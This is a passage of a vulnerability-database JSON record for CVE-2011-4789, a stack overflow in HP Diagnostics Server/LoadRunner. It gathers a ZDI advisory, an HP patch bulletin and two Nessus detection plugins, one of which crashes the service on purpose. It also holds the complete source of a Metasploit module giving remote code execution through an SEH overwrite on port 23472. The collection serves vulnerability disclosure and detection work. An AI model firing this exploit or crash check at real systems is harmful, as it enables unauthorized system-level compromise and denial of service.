vulnerable installations of HP Diagnostics server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way the HP Diagnostics server handles incomming packets with 0x00000000 as the first 32-bit value. The magentservice.exe process listens on port 23472 by default. It will eventually take that first dword, decrease it by one and use it as a size value to copy data into a stack buffer. The resulting stack-based buffer overflow can result in remote code execution under the system user.", "modified": "2012-06-22T00:00:00", "published": "2012-01-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-016/", "id": "ZDI-12-016", "title": "(0Day) HP Diagnostics Server magentservice.exe Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:37:15", "description": "This module exploits a stack buffer overflow in HP Diagnostics Server magentservice.exe service. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. Originally found and posted by AbdulAziz Harir via ZDI.\n", "published": "2012-01-25T18:04:30", "type": "metasploit", "title": "HP Diagnostics Server magentservice.exe Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_MAGENTSERVICE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP Diagnostics Server magentservice.exe Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP Diagnostics Server\n magentservice.exe service. By sending a specially crafted packet, an attacker\n may be able to execute arbitrary code. Originally found and posted by\n AbdulAziz Harir via ZDI.\n },\n 'Author' =>\n [\n 'AbdulAziz Hariri', # Original discovery\n 'hal', # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['OSVDB', '72815'],\n ['CVE', '2011-4789'],\n ['ZDI', '12-016']\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n 'SSL' => true,\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'DefaultTarget' => 0,\n 'Targets' =>\n [\n [\n 'Diagnostics Server 9.10',\n {\n # pop esi # pop ebx # ret 10\n # magentservice.exe\n 'Ret' => 0x780c8f1f\n }\n ]\n ],\n 'DisclosureDate' => '2012-01-12'))\n\n register_options([Opt::RPORT(23472)])\n end\n\n def exploit\n\n req = \"\\x00\\x00\\x00\\x00\"\n req << rand_text_alpha_upper(1092)\n req << generate_seh_payload(target.ret)\n\n connect\n sock.put(req)\n\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_magentservice.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-4789"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-016 : (0Day) HP Diagnostics Server magentservice.exe Remote\r\nCode Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-016\r\nJanuary 12, 2012\r\n\r\n- -- CVE ID:\r\nCVE-2011-4789\r\n\r\n- -- CVSS:\r\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\r\n\r\n- -- Affected Vendors:\r\n\r\nHewlett-Packard\r\n\r\n\r\n\r\n- -- Affected Products:\r\n\r\nHewlett-Packard Diagnostics Server\r\n\r\n\r\n\r\n- -- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Diagnostics server. Authentication is not\r\nrequired to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the way the HP Diagnostics server\r\nhandles incomming packets with 0x00000000 as the first 32-bit value. The\r\nmagentservice.exe process listens on port 23472 by default. It will\r\neventually take that first dword, decrease it by one and use it as a\r\nsize value to copy data into a stack buffer. The resulting stack-based\r\nbuffer overflow can result in remote code execution under the system user.\r\n\r\n- -- Vendor Response:\r\n\r\n\r\n\r\n- -- Mitigation:\r\nHP states that a patch for this vulnerability will be made available to\r\nthe public "soon." Until that time, it is recommended that\r\nadministrators of Diagnostics Server enabled systems restrict access to\r\nport 23472 to trusted hosts only.\r\n\r\n\r\n- -- Disclosure Timeline:\r\n2011-06-03 - Vulnerability reported to vendor\r\n\r\n2012-01-12 - 0Day advisory released in accordance with the ZDI 180 day\r\ndeadline policy\r\n\r\n\r\n\r\n- -- Credit:\r\nThis vulnerability was discovered by:\r\n\r\n* AbdulAziz Hariri\r\n\r\n\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.17 (MingW32)\r\n\r\niQEcBAEBAgAGBQJPDzARAAoJEFVtgMGTo1scM8oH/AtjGCHk8dSCb/y0ePEqD7QY\r\nIbXPlK73oHAxCi/hEV14VvKaJaqJuNNpl7jL26mHH/Pv8A4T3su6T8kPKfiL4l5X\r\nPokWKqB7yDeDlV8Ny4uzOjrNBQkIUms6eCLuwMEJdscVkgosUP1HRYN8jQRvunqV\r\nA5gd4E//IC6R0s/YcECjKVSSkXGOpMZOed6EHSW4kc8djgC9YlrpXBamCP5XOTqY\r\nmPqOIY5JZntbJBnbaZDfcI+Prp/gEAUPyzPqzQt8kclASS7IVyROwfpUH9qq8jZ0\r\naamNBP07FhBZZzoYZqSIczakat7/970utk22vQ/cduMtZiq0gqS7dgp5LMbiozA=\r\n=mCRY\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-01-16T00:00:00", "published": "2012-01-16T00:00:00", "id": "SECURITYVULNS:DOC:27557", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27557", "title": "ZDI-12-016 : (0Day) HP Diagnostics Server magentservice.exe Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "cvelist": ["CVE-2011-4789"], "description": "Buffer overflow on TCP/23472 request parsing", "edition": 1, "modified": "2012-06-03T00:00:00", "published": "2012-06-03T00:00:00", "id": "SECURITYVULNS:VULN:12143", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12143", "title": "HP Diagnostics Server buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2011-4789", "CVE-2011-2328"], "description": "Few different buffer overflows.", "edition": 1, "modified": "2013-04-09T00:00:00", "published": "2013-04-09T00:00:00", "id": "SECURITYVULNS:VULN:12998", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12998", "title": "HP LoadRunner security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2011-4789", "CVE-2011-2328"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03216705\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03216705\r\nVersion: 2\r\n\r\nHPSBMU02785 SSRT100526 rev.2 - HP LoadRunner Running on Windows, Remote\r\nExecution of Arbitrary Code, Denial of Service (DoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-04-04\r\nLast Updated: 2013-04-04\r\n\r\nPotential Security Impact: Remote execution of arbitrary code, Denial of\r\nService (DoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP LoadRunner\r\nrunning on Windows. The vulnerability can be exploited remotely to execute\r\narbitrary code or cause a Denial of Service (DoS).\r\n\r\nReferences: CVE-2011-4789, ZDI-CAN-1259, ZDI-12-016\r\nSSRT100351, CVE-2011-2328, VU#987308\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP LoadRunner v11.00 before patch 4 running on Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-4789 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2011-2328 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP LoadRunner 11.00 patch 4 to resolve the vulnerability. The\r\npatch is available here: http://support.openview.hp.com/selfsolve/patches\r\n\r\nNote: ZDI-12-016 lists the vulnerable product as HP Diagnostics Server.\r\nHowever, the vulnerable product is actually HP LoadRunner.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 29 May 2012 Initial release\r\nVersion:2 (rev.2) - 04 April 2013 Added CVE-2011-2328 as also resolved with\r\nthis update\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated\r\nperiodically, is contained in HP Security Notice HPSN-2011-001:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c02964430\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlFdfqYACgkQ4B86/C0qfVmzogCePXQrBn8Z9l33Lexca2rsl17X\r\nVLYAn2M0IYffrJtgCummy2KJlJGn+/V1\r\n=tOUm\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2013-04-09T00:00:00", "published": "2013-04-09T00:00:00", "id": "SECURITYVULNS:DOC:29247", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29247", "title": "[security bulletin] HPSBMU02785 SSRT100526 rev.2 - HP LoadRunner Running on Windows, Remote Execution of Arbitrary Code, Denial of Service (DoS)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-03-01T03:31:06", "description": "The version of HP LoadRunner hosted on the remote Windows host is\npotentially affected by a code execution vulnerability. The application\nfails to properly handle incoming packets with '0x00000000' as the first\n32-bit value. A remote, unauthenticated attacker, exploiting this flaw,\ncould execute arbitrary code on the remote host subject to the\nprivileges of the user running the affected application. \n\nThis plugin sends crafted packets to the LoadRunner Agent service, which\nwill crash a vulnerable instance. If it is successful, a manual restart\nof the service is necessary.", "edition": 27, "published": "2012-11-13T00:00:00", "title": "HP LoadRunner < 11.00 Patch 4 Code Execution (intrusive check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4789"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:hp:loadrunner"], "id": "HP_LOADRUNNER_CVE-2011-4789.NASL", "href": "https://www.tenable.com/plugins/nessus/62902", "sourceData": "\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62902);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2011-4789\");\n script_bugtraq_id(51398);\n\n script_name(english:\"HP LoadRunner < 11.00 Patch 4 Code Execution (intrusive check)\");\n script_summary(english:\"Checks response from HP Load Runner Agent\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a software performance testing application\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP LoadRunner hosted on the remote Windows host is\npotentially affected by a code execution vulnerability. The application\nfails to properly handle incoming packets with '0x00000000' as the first\n32-bit value. A remote, unauthenticated attacker, exploiting this flaw,\ncould execute arbitrary code on the remote host subject to the\nprivileges of the user running the affected application. \n\nThis plugin sends crafted packets to the LoadRunner Agent service, which\nwill crash a vulnerable instance. If it is successful, a manual restart\nof the service is necessary.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-016/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/522928/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b6425436\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to HP LoadRunner 11.00 Patch 4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP Diagnostics Server magentservice.exe Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:loadrunner\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies('loadrunner_agent_detect.nasl', 'ssl_supported_versions.nasl', 'os_fingerprint.nasl');\n script_require_keys('SSL/Supported');\n script_require_ports('Services/loadrunner_agent', 54345);\n \n exit(0);\n}\n\ninclude('audit.inc');\ninclude('byte_func.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\n\n#\n# HPSBMU02785 SSRT100526 says only HP LoadRunner running on Windows is affected\n#\nif (report_paranoia < 2)\n{\n os = get_kb_item_or_exit('Host/OS');\n if ('Windows' >!< os) audit(AUDIT_OS_NOT, 'Windows');\n}\n\nport = get_service(svc:'loadrunner_agent', default:54345, exit_on_fail:TRUE);\n\n# \n# The attack appears to work on SSLv3 only\n# Check for SSLv3 on remote port\nssl3 = 0;\nlist = get_kb_list('SSL/Transport/'+port);\nif (!isnull(list))\n{\n list = make_list(list);\n foreach encap (list)\n {\n if(encap == ENCAPS_SSLv3)\n {\n ssl3 = 1;\n break;\n }\n }\n}\n\nif (!ssl3) exit(0, 'The service listening on port '+port+' does not appear to support SSL 3.0.'); \n\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port, 'TCP');\n\nsoc = open_sock_tcp(port, transport: ENCAPS_SSLv3);\nif (!soc) audit(AUDIT_SOCK_FAIL, port, 'TCP'); \n\n\nsend(socket:soc, data:'\\x00\\x00\\x00\\x00');\n# Wait a bit before closing the socket so that the remote end can read on a still open socket.\n# Closing the socket immediately after the send may cause SSL_Read() on the remote host to fail\n# because Nessus has just closed the connection. \nrecv(socket:soc, length:1024);\nclose(soc);\n\n# Vulnerable server should be dead now\nsoc = open_sock_tcp(port, transport: ENCAPS_SSLv3);\nif (!soc) security_hole(port:port);\n\n# We should be able to reconnect to the patched server\nelse audit(AUDIT_LISTEN_NOT_VULN, 'HP LoadRunner', port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:31:05", "description": "The version of HP LoadRunner installed on the remote Windows host is\npotentially affected by a code execution vulnerability. The\napplication fails to properly handle incoming packets with \n'0x00000000' as the first 32-bit value. A remote, unauthenticated \nattacker, exploiting this flaw, could execute arbitrary code on the \nremote host subject to the privileges of the user running the affected\napplication.", "edition": 27, "published": "2012-06-26T00:00:00", "title": "HP LoadRunner < 11.00 Patch 4 Code Execution Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4789"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:hp:loadrunner"], "id": "HP_LOADRUNNER_11_PATCH4_CODE_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/59718", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59718);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2011-4789\");\n script_bugtraq_id(51398);\n\n script_name(english:\"HP LoadRunner < 11.00 Patch 4 Code Execution Vulnerability\");\n script_summary(english:\"Checks version of HP Load Runner\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a software performance testing \napplication that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP LoadRunner installed on the remote Windows host is\npotentially affected by a code execution vulnerability. The\napplication fails to properly handle incoming packets with \n'0x00000000' as the first 32-bit value. A remote, unauthenticated \nattacker, exploiting this flaw, could execute arbitrary code on the \nremote host subject to the privileges of the user running the affected\napplication.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-016/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/522928/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to HP LoadRunner 11.00 Patch 4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP Diagnostics Server magentservice.exe Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:loadrunner\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_loadrunner_installed.nasl\");\n script_require_keys(\"SMB/HP LoadRunner/Version\", \"SMB/HP LoadRunner/VersionUI\", \"SMB/HP LoadRunner/Path\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\napp = 'HP LoadRunner';\nversion = get_kb_item_or_exit('SMB/'+app+'/Version');\nverui = get_kb_item('SMB/'+app+'/VersionUI');\nif (isnull(verui))\n{\n ver = split(version, sep:'.', keep:FALSE);\n verui = ver[0] + '.' + ver[1] + '.0';\n}\n\nfix = '11.4.2021.0';\nif (ver_compare(ver:version, fix:fix) == -1)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item('SMB/'+app+'/Path');\n if (isnull(path)) path = 'n/a';\n report = \n '\\n Path : ' + path +\n '\\n Installed version : ' + verui +\n '\\n Fixed version : 11.4.0\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n exit(0);\n}\naudit(AUDIT_INST_VER_NOT_VULN, app, verui);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
